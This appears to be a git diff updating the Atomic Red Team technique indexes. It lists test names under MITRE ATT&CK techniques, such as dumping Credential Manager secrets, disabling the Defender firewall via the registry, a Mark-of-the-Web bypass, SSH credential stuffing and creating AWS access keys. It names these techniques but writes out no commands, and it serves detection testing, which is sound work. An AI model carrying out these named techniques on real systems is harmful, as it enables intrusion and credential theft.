 command-and-control,T1105,Ingress Tool Transfer,4,scp remote file copy (pull),b9d22b9a-9778-4426-abf0-568ea64e9c33,bash
 command-and-control,T1105,Ingress Tool Transfer,5,sftp remote file copy (push),f564c297-7978-4aa9-b37a-d90477feea4e,bash
 command-and-control,T1105,Ingress Tool Transfer,6,sftp remote file copy (pull),0139dba1-f391-405e-a4f5-f3989f2c88ef,bash
+command-and-control,T1105,Ingress Tool Transfer,14,whois file download,c99a829f-0bb8-4187-b2c6-d47d1df74cab,sh
 command-and-control,T1090.001,Internal Proxy,1,Connection Proxy,0ac21132-4485-4212-a681-349e8a6637cd,sh
 command-and-control,T1090.001,Internal Proxy,2,Connection Proxy for macOS UI,648d68c1-8bcd-4486-9abe-71c6655b6a2c,sh
 command-and-control,T1571,Non-Standard Port,2,Testing usage of uncommonly used port,5db21e1d-dd9c-4a50-b885-b1e748912767,sh
diff --git a/atomics/Indexes/Indexes-CSV/windows-index.csv b/atomics/Indexes/Indexes-CSV/windows-index.csv
index 5d54166f..cfb7be52 100644
--- a/atomics/Indexes/Indexes-CSV/windows-index.csv
+++ b/atomics/Indexes/Indexes-CSV/windows-index.csv
@@ -3,6 +3,8 @@ credential-access,T1056.004,Credential API Hooking,1,Hook PowerShell TLS Encrypt
 credential-access,T1552.001,Credentials In Files,3,Extracting passwords with findstr,0e56bf29-ff49-4ea5-9af4-3b81283fd513,powershell
 credential-access,T1552.001,Credentials In Files,4,Access unattend.xml,367d4004-5fc0-446d-823f-960c74ae52c3,command_prompt
 credential-access,T1555,Credentials from Password Stores,1,Extract Windows Credential Manager via VBA,234f9b7c-b53d-4f32-897b-b880a6c9ea7b,powershell
+credential-access,T1555,Credentials from Password Stores,2,Dump credentials from Windows Credential Manager With PowerShell [windows Credentials],c89becbe-1758-4e7d-a0f4-97d2188a23e3,powershell
+credential-access,T1555,Credentials from Password Stores,3,Dump credentials from Windows Credential Manager With PowerShell [web Credentials],8fd5a296-6772-4766-9991-ff4e92af7240,powershell
 credential-access,T1555.003,Credentials from Web Browsers,1,Run Chrome-password Collector,8c05b133-d438-47ca-a630-19cc464c4622,powershell
 credential-access,T1555.003,Credentials from Web Browsers,3,LaZagne - Credentials from Browser,9a2915b3-3954-4cce-8c76-00fbf4dbd014,command_prompt
 credential-access,T1552.002,Credentials in Registry,1,Enumeration for Credentials in Registry,b6ec082c-7384-46b3-a111-9a9b8b14e5e7,command_prompt
@@ -184,10 +186,11 @@ defense-evasion,T1562.002,Disable Windows Event Logging,2,Kill Event Log Service
 defense-evasion,T1562.002,Disable Windows Event Logging,3,Impair Windows Audit Log Policy,5102a3a7-e2d7-4129-9e45-f483f2e0eea8,command_prompt
 defense-evasion,T1562.002,Disable Windows Event Logging,4,Clear Windows Audit Policy Config,913c0e4e-4b37-4b78-ad0b-90e7b25010f6,command_prompt
 defense-evasion,T1562.004,Disable or Modify System Firewall,2,Disable Microsoft Defender Firewall,88d05800-a5e4-407e-9b53-ece4174f197f,command_prompt
-defense-evasion,T1562.004,Disable or Modify System Firewall,3,Allow SMB and RDP on Microsoft Defender Firewall,d9841bf8-f161-4c73-81e9-fd773a5ff8c1,command_prompt
-defense-evasion,T1562.004,Disable or Modify System Firewall,4,Opening ports for proxy - HARDRAIN,15e57006-79dd-46df-9bf9-31bc24fb5a80,command_prompt
-defense-evasion,T1562.004,Disable or Modify System Firewall,5,Open a local port through Windows Firewall to any profile,9636dd6e-7599-40d2-8eee-ac16434f35ed,powershell
-defense-evasion,T1562.004,Disable or Modify System Firewall,6,Allow Executable Through Firewall Located in Non-Standard Location,6f5822d2-d38d-4f48-9bfc-916607ff6b8c,powershell
+defense-evasion,T1562.004,Disable or Modify System Firewall,3,Disable Microsoft Defender Firewall via Registry,afedc8c4-038c-4d82-b3e5-623a95f8a612,command_prompt
+defense-evasion,T1562.004,Disable or Modify System Firewall,4,Allow SMB and RDP on Microsoft Defender Firewall,d9841bf8-f161-4c73-81e9-fd773a5ff8c1,command_prompt
+defense-evasion,T1562.004,Disable or Modify System Firewall,5,Opening ports for proxy - HARDRAIN,15e57006-79dd-46df-9bf9-31bc24fb5a80,command_prompt
+defense-evasion,T1562.004,Disable or Modify System Firewall,6,Open a local port through Windows Firewall to any profile,9636dd6e-7599-40d2-8eee-ac16434f35ed,powershell
+defense-evasion,T1562.004,Disable or Modify System Firewall,7,Allow Executable Through Firewall Located in Non-Standard Location,6f5822d2-d38d-4f48-9bfc-916607ff6b8c,powershell
 defense-evasion,T1562.001,Disable or Modify Tools,10,Unload Sysmon Filter Driver,811b3e76-c41b-430c-ac0d-e2380bfaa164,command_prompt
 defense-evasion,T1562.001,Disable or Modify Tools,11,Uninstall Sysmon,a316fb2e-5344-470d-91c1-23e15c374edc,command_prompt
 defense-evasion,T1562.001,Disable or Modify Tools,12,AMSI Bypass - AMSI InitFailed,695eed40-e949-40e5-b306-b4031e4154bd,powershell
@@ -214,7 +217,7 @@ defense-evasion,T1564.001,Hidden Files and Directories,3,Create Windows System F
 defense-evasion,T1564.001,Hidden Files and Directories,4,Create Windows Hidden File with Attrib,dadb792e-4358-4d8d-9207-b771faa0daa5,command_prompt
 defense-evasion,T1564.003,Hidden Window,1,Hidden Window,f151ee37-9e2b-47e6-80e4-550b9f999b7a,powershell
 defense-evasion,T1564,Hide Artifacts,1,Extract binary files via VBA,6afe288a-8a8b-4d33-a629-8d03ba9dad3a,powershell
-defense-evasion,T1564,Hide Artifacts,2,"Create a user called ""$"" as noted here",2ec63cc2-4975-41a6-bf09-dffdfb610778,command_prompt
+defense-evasion,T1564,Hide Artifacts,2,"Create a Hidden User Called ""$""",2ec63cc2-4975-41a6-bf09-dffdfb610778,command_prompt
 defense-evasion,T1564,Hide Artifacts,3,"Create an ""Administrator "" user (with a space on the end)",5bb20389-39a5-4e99-9264-aeb92a55a85c,powershell
 defense-evasion,T1070,Indicator Removal on Host,1,Indicator Removal using FSUtil,b4115c7a-0e92-47f0-a61e-17e7218b2435,command_prompt
 defense-evasion,T1202,Indirect Command Execution,1,Indirect Command Execution - pcalua.exe,cecfea7a-5f03-4cdd-8bc8-6f7c22862440,command_prompt
@@ -233,6 +236,8 @@ defense-evasion,T1218.004,InstallUtil,8,InstallUtil evasive invocation,559e6d06-
 defense-evasion,T1078.003,Local Accounts,1,Create local account with admin priviliges,a524ce99-86de-4db6-b4f9-e08f35a47a15,command_prompt
 defense-evasion,T1127.001,MSBuild,1,MSBuild Bypass Using Inline Tasks (C#),58742c0f-cb01-44cd-a60b-fb26e8871c93,command_prompt
 defense-evasion,T1127.001,MSBuild,2,MSBuild Bypass Using Inline Tasks (VB),ab042179-c0c5-402f-9bc8-42741f5ce359,command_prompt
+defense-evasion,T1553.005,Mark-of-the-Web Bypass,1,Mount ISO image,002cca30-4778-4891-878a-aaffcfa502fa,powershell
+defense-evasion,T1553.005,Mark-of-the-Web Bypass,2,Mount an ISO image and run executable from the ISO,42f22b00-0242-4afc-a61b-0da05041f9cc,powershell
 defense-evasion,T1036.004,Masquerade Task or Service,1,Creating W32Time similar named service using schtasks,f9f2fe59-96f7-4a7d-ba9f-a9783200d4c9,command_prompt
 defense-evasion,T1036.004,Masquerade Task or Service,2,Creating W32Time similar named service using sc,b721c6ef-472c-4263-a0d9-37f1f4ecff66,command_prompt
 defense-evasion,T1036,Masquerading,1,System File Copied to Unusual Location,51005ac7-52e2-45e0-bdab-d17c6d4916cd,command_prompt
@@ -411,6 +416,7 @@ impact,T1531,Account Access Removal,1,Change User Password - Windows,1b99ef28-f8
 impact,T1531,Account Access Removal,2,Delete User - Windows,f21a1d7d-a62f-442a-8c3a-2440d43b19e5,command_prompt
 impact,T1531,Account Access Removal,3,Remove Account From Domain Admin Group,43f71395-6c37-498e-ab17-897d814a0947,powershell
 impact,T1485,Data Destruction,1,Windows - Overwrite file with Sysinternals SDelete,476419b5-aebf-4366-a131-ae3e8dae5fc2,powershell
+impact,T1486,Data Encrypted for Impact,5,PureLocker Ransom Note,649349c7-9abf-493b-a7a2-b1aa4d141528,command_prompt
 impact,T1490,Inhibit System Recovery,1,Windows - Delete Volume Shadow Copies,43819286-91a9-4369-90ed-d31fb4da2c01,command_prompt
 impact,T1490,Inhibit System Recovery,2,Windows - Delete Volume Shadow Copies via WMI,6a3ff8dd-f49c-4272-a658-11c2fe58bd88,command_prompt
 impact,T1490,Inhibit System Recovery,3,Windows - wbadmin Delete Windows Backup Catalog,263ba6cb-ea2b-41c9-9d4e-b652dadd002c,command_prompt
@@ -570,6 +576,7 @@ execution,T1053.005,Scheduled Task,5,Task Scheduler via VBA,ecd3fa21-7792-41a2-8
 execution,T1053.005,Scheduled Task,6,WMI Invoke-CimMethod Scheduled Task,e16b3b75-dc9e-4cde-a23d-dfa2d0507b3b,powershell
 execution,T1569.002,Service Execution,1,Execute a Command as a Service,2382dee2-a75f-49aa-9378-f52df6ed3fb1,command_prompt
 execution,T1569.002,Service Execution,2,Use PsExec to execute a command on a remote host,873106b7-cfed-454b-8680-fa9f6400431c,command_prompt
+execution,T1072,Software Deployment Tools,1,Radmin Viewer Utility,b4988cad-6ed2-434d-ace5-ea2670782129,command_prompt
 execution,T1059.005,Visual Basic,1,Visual Basic script execution to gather local computer information,1620de42-160a-4fe5-bbaf-d3fef0181ce9,powershell
 execution,T1059.005,Visual Basic,2,Encoded VBS code execution,e8209d5f-e42d-45e6-9c2f-633ac4f1eefa,powershell
 execution,T1059.005,Visual Basic,3,Extract Memory via VBA,8faff437-a114-4547-9a60-749652a03df6,powershell
@@ -598,6 +605,7 @@ lateral-movement,T1021.002,SMB/Windows Admin Shares,1,Map admin share,3386975b-3
 lateral-movement,T1021.002,SMB/Windows Admin Shares,2,Map Admin Share PowerShell,514e9cd7-9207-4882-98b1-c8f791bae3c5,powershell
 lateral-movement,T1021.002,SMB/Windows Admin Shares,3,Copy and Execute File with PsExec,0eb03d41-79e4-4393-8e57-6344856be1cf,command_prompt
 lateral-movement,T1021.002,SMB/Windows Admin Shares,4,Execute command writing output to local Admin Share,d41aaab5-bdfe-431d-a3d5-c29e9136ff46,command_prompt
+lateral-movement,T1072,Software Deployment Tools,1,Radmin Viewer Utility,b4988cad-6ed2-434d-ace5-ea2670782129,command_prompt
 lateral-movement,T1021.006,Windows Remote Management,1,Enable Windows Remote Management,9059e8de-3d7d-4954-a322-46161880b9cf,powershell
 lateral-movement,T1021.006,Windows Remote Management,2,Invoke-Command,5295bd61-bd7e-4744-9d52-85962a4cf2d6,powershell
 lateral-movement,T1021.006,Windows Remote Management,3,WinRM Access with Evil-WinRM,efe86d95-44c4-4509-ae42-7bfd9d1f5b3d,powershell
diff --git a/atomics/Indexes/Indexes-Markdown/index.md b/atomics/Indexes/Indexes-Markdown/index.md
index 6c7e9586..62d2f1af 100644
--- a/atomics/Indexes/Indexes-Markdown/index.md
+++ b/atomics/Indexes/Indexes-Markdown/index.md
@@ -15,7 +15,9 @@
   - Atomic Test #2: Cat the contents of a Kubernetes service account token file [linux]
 - [T1056.004 Credential API Hooking](../../T1056.004/T1056.004.md)
   - Atomic Test #1: Hook PowerShell TLS Encrypt/Decrypt Messages [windows]
-- T1110.004 Credential Stuffing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- [T1110.004 Credential Stuffing](../../T1110.004/T1110.004.md)
+  - Atomic Test #1: SSH Credential Stuffing From Linux [linux]
+  - Atomic Test #2: SSH Credential Stuffing From MacOS [macos]
 - [T1552.001 Credentials In Files](../../T1552.001/T1552.001.md)
   - Atomic Test #1: Extract Browser and System credentials with LaZagne [macos]
   - Atomic Test #2: Extract passwords with grep [macos, linux]
@@ -24,6 +26,8 @@
   - Atomic Test #5: Find and Access Github Credentials [macos, linux]
 - [T1555 Credentials from Password Stores](../../T1555/T1555.md)
   - Atomic Test #1: Extract Windows Credential Manager via VBA [windows]
+  - Atomic Test #2: Dump credentials from Windows Credential Manager With PowerShell [windows Credentials] [windows]
+  - Atomic Test #3: Dump credentials from Windows Credential Manager With PowerShell [web Credentials] [windows]
 - [T1555.003 Credentials from Web Browsers](../../T1555.003/T1555.003.md)
   - Atomic Test #1: Run Chrome-password Collector [windows]
   - Atomic Test #2: Search macOS Safari Cookies [macos]
@@ -105,7 +109,9 @@
   - Atomic Test #2: Discover Private SSH Keys [macos, linux]
   - Atomic Test #3: Copy Private SSH Keys with CP [linux]
   - Atomic Test #4: Copy Private SSH Keys with rsync [macos, linux]
-- T1003.007 Proc Filesystem [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- [T1003.007 Proc Filesystem](../../T1003.007/T1003.007.md)
+  - Atomic Test #1: Dump individual process memory with sh (Local) [linux]
+  - Atomic Test #2: Dump individual process memory with Python (Local) [linux]
 - T1606.002 SAML Tokens [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - [T1003.002 Security Account Manager](../../T1003.002/T1003.002.md)
   - Atomic Test #1: Registry dump of SAM, creds, and secrets [windows]
@@ -370,6 +376,7 @@
   - Atomic Test #3: Disable tty_tickets for sudo caching [macos, linux]
 - [T1543.002 Systemd Service](../../T1543.002/T1543.002.md)
   - Atomic Test #1: Create Systemd Service [linux]
+  - Atomic Test #2: Create Systemd Service file,  Enable the service , Modify and Reload the service. [linux]
 - [T1053.006 Systemd Timers](../../T1053.006/T1053.006.md)
   - Atomic Test #1: Create Systemd Service and Timer [linux]
 - T1055.003 Thread Execution Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
@@ -494,10 +501,11 @@
 - [T1562.004 Disable or Modify System Firewall](../../T1562.004/T1562.004.md)
   - Atomic Test #1: Disable firewall [linux]
   - Atomic Test #2: Disable Microsoft Defender Firewall [windows]
-  - Atomic Test #3: Allow SMB and RDP on Microsoft Defender Firewall [windows]
-  - Atomic Test #4: Opening ports for proxy - HARDRAIN [windows]
-  - Atomic Test #5: Open a local port through Windows Firewall to any profile [windows]
-  - Atomic Test #6: Allow Executable Through Firewall Located in Non-Standard Location [windows]
+  - Atomic Test #3: Disable Microsoft Defender Firewall via Registry [windows]
+  - Atomic Test #4: Allow SMB and RDP on Microsoft Defender Firewall [windows]
+  - Atomic Test #5: Opening ports for proxy - HARDRAIN [windows]
+  - Atomic Test #6: Open a local port through Windows Firewall to any profile [windows]
+  - Atomic Test #7: Allow Executable Through Firewall Located in Non-Standard Location [windows]
 - [T1562.001 Disable or Modify Tools](../../T1562.001/T1562.001.md)
   - Atomic Test #1: Disable syslog [linux]
   - Atomic Test #2: Disable Cb Response [linux]
@@ -571,7 +579,7 @@
   - Atomic Test #1: Hidden Window [windows]
 - [T1564 Hide Artifacts](../../T1564/T1564.md)
   - Atomic Test #1: Extract binary files via VBA [windows]
-  - Atomic Test #2: Create a user called "$" as noted here [windows]
+  - Atomic Test #2: Create a Hidden User Called "$" [windows]
   - Atomic Test #3: Create an "Administrator " user (with a space on the end) [windows]
 - T1574 Hijack Execution Flow [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - [T1562.003 Impair Command History Logging](../../T1562.003/T1562.003.md)
@@ -621,13 +629,16 @@
   - Atomic Test #1: MSBuild Bypass Using Inline Tasks (C#) [windows]
   - Atomic Test #2: MSBuild Bypass Using Inline Tasks (VB) [windows]
 - T1134.003 Make and Impersonate Token [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
-- T1553.005 Mark-of-the-Web Bypass [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- [T1553.005 Mark-of-the-Web Bypass](../../T1553.005/T1553.005.md)
+  - Atomic Test #1: Mount ISO image [windows]
+  - Atomic Test #2: Mount an ISO image and run executable from the ISO [windows]
 - [T1036.004 Masquerade Task or Service](../../T1036.004/T1036.004.md)
   - Atomic Test #1: Creating W32Time similar named service using schtasks [windows]
   - Atomic Test #2: Creating W32Time similar named service using sc [windows]
 - [T1036 Masquerading](../../T1036/T1036.md)
   - Atomic Test #1: System File Copied to Unusual Location [windows]
-- T1036.005 Match Legitimate Name or Location [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- [T1036.005 Match Legitimate Name or Location](../../T1036.005/T1036.005.md)
+  - Atomic Test #1: Execute a process from a directory masquerading as the current parent directory. [macos, linux]
 - T1556 Modify Authentication Process [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - T1578 Modify Cloud Compute Infrastructure [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - [T1112 Modify Registry](../../T1112/T1112.md)
@@ -836,10 +847,12 @@
 - [T1098 Account Manipulation](../../T1098/T1098.md)
   - Atomic Test #1: Admin Account Manipulate [windows]
   - Atomic Test #2: Domain Account and Group Manipulate [windows]
+  - Atomic Test #3: AWS - Create a group and add a user to that group [iaas:aws]
 - T1547.014 Active Setup [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - T1098.003 Add Office 365 Global Administrator Role [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - T1137.006 Add-ins [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
-- T1098.001 Additional Cloud Credentials [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- [T1098.001 Additional Cloud Credentials](../../T1098.001/T1098.001.md)
+  - Atomic Test #1: AWS - Create Access Key and Secret Key [iaas:aws]
 - T1546.009 AppCert DLLs [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - [T1546.010 AppInit DLLs](../../T1546.010/T1546.010.md)
   - Atomic Test #1: Install AppInit Shim [windows]
@@ -871,7 +884,8 @@
   - Atomic Test #3: Registry-free process scope COR_PROFILER [windows]
 - [T1546.001 Change Default File Association](../../T1546.001/T1546.001.md)
   - Atomic Test #1: Change Default File Association [windows]
-- T1136.003 Cloud Account [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- [T1136.003 Cloud Account](../../T1136.003/T1136.003.md)
+  - Atomic Test #1: AWS - Create a new IAM user [iaas:aws]
 - T1078.004 Cloud Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - T1542.002 Component Firmware [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - T1546.015 Component Object Model Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
@@ -1013,6 +1027,7 @@
 - T1542.001 System Firmware [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - [T1543.002 Systemd Service](../../T1543.002/T1543.002.md)
   - Atomic Test #1: Create Systemd Service [linux]
+  - Atomic Test #2: Create Systemd Service file,  Enable the service , Modify and Reload the service. [linux]
 - [T1053.006 Systemd Timers](../../T1053.006/T1053.006.md)
   - Atomic Test #1: Create Systemd Service and Timer [linux]
 - T1542.005 TFTP Boot [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
@@ -1055,6 +1070,7 @@
   - Atomic Test #2: Encrypt files using 7z (Linux) [linux]
   - Atomic Test #3: Encrypt files using ccrypt (Linux) [linux]
   - Atomic Test #4: Encrypt files using openssl (Linux) [linux]
+  - Atomic Test #5: PureLocker Ransom Note [windows]
 - T1565 Data Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - T1491 Defacement [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - T1498.001 Direct Network Flood [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
@@ -1432,7 +1448,8 @@
   - Atomic Test #1: Execute a Command as a Service [windows]
   - Atomic Test #2: Use PsExec to execute a command on a remote host [windows]
 - T1129 Shared Modules [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
-- T1072 Software Deployment Tools [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- [T1072 Software Deployment Tools](../../T1072/T1072.md)
+  - Atomic Test #1: Radmin Viewer Utility [windows]
 - T1153 Source [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - T1569 System Services [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - [T1053.006 Systemd Timers](../../T1053.006/T1053.006.md)
@@ -1487,7 +1504,8 @@
 - T1021.004 SSH [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - T1563.001 SSH Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - T1051 Shared Webroot [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
-- T1072 Software Deployment Tools [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- [T1072 Software Deployment Tools](../../T1072/T1072.md)
+  - Atomic Test #1: Radmin Viewer Utility [windows]
 - T1080 Taint Shared Content [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - T1550 Use Alternate Authentication Material [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - T1021.005 VNC [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
@@ -1535,6 +1553,7 @@
   - Atomic Test #11: OSTAP Worming Activity [windows]
   - Atomic Test #12: svchost writing a file to a UNC path [windows]
   - Atomic Test #13: Download a File with Windows Defender MpCmdRun.exe [windows]
+  - Atomic Test #14: whois file download [linux, macos]
 - [T1090.001 Internal Proxy](../../T1090.001/T1090.001.md)
   - Atomic Test #1: Connection Proxy [macos, linux]
   - Atomic Test #2: Connection Proxy for macOS UI [macos]
diff --git a/atomics/Indexes/Indexes-Markdown/linux-index.md b/atomics/Indexes/Indexes-Markdown/linux-index.md
index de2b75a9..64db3fe8 100644
--- a/atomics/Indexes/Indexes-Markdown/linux-index.md
+++ b/atomics/Indexes/Indexes-Markdown/linux-index.md
@@ -11,7 +11,8 @@
 - [T1552.007 Container API](../../T1552.007/T1552.007.md)
   - Atomic Test #1: ListSecrets [macos, linux]
   - Atomic Test #2: Cat the contents of a Kubernetes service account token file [linux]
-- T1110.004 Credential Stuffing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- [T1110.004 Credential Stuffing](../../T1110.004/T1110.004.md)
+  - Atomic Test #1: SSH Credential Stuffing From Linux [linux]
 - [T1552.001 Credentials In Files](../../T1552.001/T1552.001.md)
   - Atomic Test #2: Extract passwords with grep [macos, linux]
   - Atomic Test #5: Find and Access Github Credentials [macos, linux]
@@ -37,7 +38,9 @@
   - Atomic Test #2: Discover Private SSH Keys [macos, linux]
   - Atomic Test #3: Copy Private SSH Keys with CP [linux]
   - Atomic Test #4: Copy Private SSH Keys with rsync [macos, linux]
-- T1003.007 Proc Filesystem [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- [T1003.007 Proc Filesystem](../../T1003.007/T1003.007.md)
+  - Atomic Test #1: Dump individual process memory with sh (Local) [linux]
+  - Atomic Test #2: Dump individual process memory with Python (Local) [linux]
 - T1606.002 SAML Tokens [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - T1555.002 Securityd Memory [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - T1528 Steal Application Access Token [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
@@ -137,6 +140,7 @@
   - Atomic Test #3: Disable tty_tickets for sudo caching [macos, linux]
 - [T1543.002 Systemd Service](../../T1543.002/T1543.002.md)
   - Atomic Test #1: Create Systemd Service [linux]
+  - Atomic Test #2: Create Systemd Service file,  Enable the service , Modify and Reload the service. [linux]
 - [T1053.006 Systemd Timers](../../T1053.006/T1053.006.md)
   - Atomic Test #1: Create Systemd Service and Timer [linux]
 - [T1546.005 Trap](../../T1546.005/T1546.005.md)
@@ -234,7 +238,8 @@
 - T1078.003 Local Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - T1036.004 Masquerade Task or Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - T1036 Masquerading [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
-- T1036.005 Match Legitimate Name or Location [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- [T1036.005 Match Legitimate Name or Location](../../T1036.005/T1036.005.md)
+  - Atomic Test #1: Execute a process from a directory masquerading as the current parent directory. [macos, linux]
 - T1556 Modify Authentication Process [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - T1578 Modify Cloud Compute Infrastructure [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - T1601 Modify System Image [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
@@ -401,10 +406,12 @@
 - T1497 Virtualization/Sandbox Evasion [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 
 # persistence
-- T1098 Account Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- [T1098 Account Manipulation](../../T1098/T1098.md)
+  - Atomic Test #3: AWS - Create a group and add a user to that group [iaas:aws]
 - T1098.003 Add Office 365 Global Administrator Role [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - T1137.006 Add-ins [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
-- T1098.001 Additional Cloud Credentials [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- [T1098.001 Additional Cloud Credentials](../../T1098.001/T1098.001.md)
+  - Atomic Test #1: AWS - Create Access Key and Secret Key [iaas:aws]
 - [T1053.001 At (Linux)](../../T1053.001/T1053.001.md)
   - Atomic Test #1: At - Schedule a job [linux]
 - T1547 Boot or Logon Autostart Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
@@ -414,7 +421,8 @@
   - Atomic Test #1: Chrome (Developer Mode) [linux, windows, macos]
   - Atomic Test #2: Chrome (Chrome Web Store) [linux, windows, macos]
   - Atomic Test #3: Firefox [linux, windows, macos]
-- T1136.003 Cloud Account [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- [T1136.003 Cloud Account](../../T1136.003/T1136.003.md)
+  - Atomic Test #1: AWS - Create a new IAM user [iaas:aws]
 - T1078.004 Cloud Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - T1554 Compromise Client Software Binary [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - [T1053.007 Container Orchestration Job](../../T1053.007/T1053.007.md)
@@ -466,6 +474,7 @@
 - T1505 Server Software Component [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - [T1543.002 Systemd Service](../../T1543.002/T1543.002.md)
   - Atomic Test #1: Create Systemd Service [linux]
+  - Atomic Test #2: Create Systemd Service file,  Enable the service , Modify and Reload the service. [linux]
 - [T1053.006 Systemd Timers](../../T1053.006/T1053.006.md)
   - Atomic Test #1: Create Systemd Service and Timer [linux]
 - T1542.005 TFTP Boot [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
@@ -603,6 +612,7 @@
   - Atomic Test #4: scp remote file copy (pull) [linux, macos]
   - Atomic Test #5: sftp remote file copy (push) [linux, macos]
   - Atomic Test #6: sftp remote file copy (pull) [linux, macos]
+  - Atomic Test #14: whois file download [linux, macos]
 - [T1090.001 Internal Proxy](../../T1090.001/T1090.001.md)
   - Atomic Test #1: Connection Proxy [macos, linux]
 - T1001.001 Junk Data [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
diff --git a/atomics/Indexes/Indexes-Markdown/macos-index.md b/atomics/Indexes/Indexes-Markdown/macos-index.md
index 215f549a..90552709 100644
--- a/atomics/Indexes/Indexes-Markdown/macos-index.md
+++ b/atomics/Indexes/Indexes-Markdown/macos-index.md
@@ -4,7 +4,8 @@
 - [T1552.003 Bash History](../../T1552.003/T1552.003.md)
   - Atomic Test #1: Search Through Bash History [linux, macos]
 - T1110 Brute Force [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
-- T1110.004 Credential Stuffing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- [T1110.004 Credential Stuffing](../../T1110.004/T1110.004.md)
+  - Atomic Test #2: SSH Credential Stuffing From MacOS [macos]
 - [T1552.001 Credentials In Files](../../T1552.001/T1552.001.md)
   - Atomic Test #1: Extract Browser and System credentials with LaZagne [macos]
   - Atomic Test #2: Extract passwords with grep [macos, linux]
@@ -202,7 +203,8 @@
   - Atomic Test #9: chattr - Remove immutable file attribute [macos, linux]
 - T1078.003 Local Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - T1036 Masquerading [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
-- T1036.005 Match Legitimate Name or Location [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- [T1036.005 Match Legitimate Name or Location](../../T1036.005/T1036.005.md)
+  - Atomic Test #1: Execute a process from a directory masquerading as the current parent directory. [macos, linux]
 - T1556 Modify Authentication Process [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - [T1027 Obfuscated Files or Information](../../T1027/T1027.md)
   - Atomic Test #1: Decode base64 Data into Script [macos, linux]
@@ -454,6 +456,7 @@
   - Atomic Test #4: scp remote file copy (pull) [linux, macos]
   - Atomic Test #5: sftp remote file copy (push) [linux, macos]
   - Atomic Test #6: sftp remote file copy (pull) [linux, macos]
+  - Atomic Test #14: whois file download [linux, macos]
 - [T1090.001 Internal Proxy](../../T1090.001/T1090.001.md)
   - Atomic Test #1: Connection Proxy [macos, linux]
   - Atomic Test #2: Connection Proxy for macOS UI [macos]
diff --git a/atomics/Indexes/Indexes-Markdown/windows-index.md b/atomics/Indexes/Indexes-Markdown/windows-index.md
index 5b6382dc..12ae449e 100644
--- a/atomics/Indexes/Indexes-Markdown/windows-index.md
+++ b/atomics/Indexes/Indexes-Markdown/windows-index.md
@@ -12,6 +12,8 @@
   - Atomic Test #4: Access unattend.xml [windows]
 - [T1555 Credentials from Password Stores](../../T1555/T1555.md)
   - Atomic Test #1: Extract Windows Credential Manager via VBA [windows]
+  - Atomic Test #2: Dump credentials from Windows Credential Manager With PowerShell [windows Credentials] [windows]
+  - Atomic Test #3: Dump credentials from Windows Credential Manager With PowerShell [web Credentials] [windows]
 - [T1555.003 Credentials from Web Browsers](../../T1555.003/T1555.003.md)
   - Atomic Test #1: Run Chrome-password Collector [windows]
